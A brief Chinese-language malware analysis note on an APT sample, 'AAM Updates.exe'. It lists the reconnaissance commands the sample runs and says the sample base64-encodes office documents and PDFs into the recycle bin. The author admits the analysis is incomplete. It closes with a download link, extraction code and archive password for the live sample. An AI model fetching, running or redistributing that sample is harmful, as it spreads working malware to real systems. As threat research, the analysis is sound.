- AAM Updates.exe
信息泄露(执行的命令)
- systeminfo
- ipconfig
- netstat
- arp
- tasklist
编码/加密
- 扩展名为 .doc、.docx、.ppt、.pptx、.xls、.xlsx、.pdf使用base64加密并放入回收站
远程连接
第一次分析APT样本,在网络连接方面没确定接收命令的接收函数在哪。从恶意程序网络连接的行为来看,可以推测存在远程命令执行的操作。另外恶意进程在任务管理器中无法删除,存在删除终止进程的文件的代码,也没定位。后面会随缘再尝试分析代码找找。感谢您读到这。
样本链接
链接:https://pan.baidu.com/s/1Y_xrV-7fAQRziJ7Z7u4PUQ
提取码:pttc
压缩密码:52pojie
参考链接: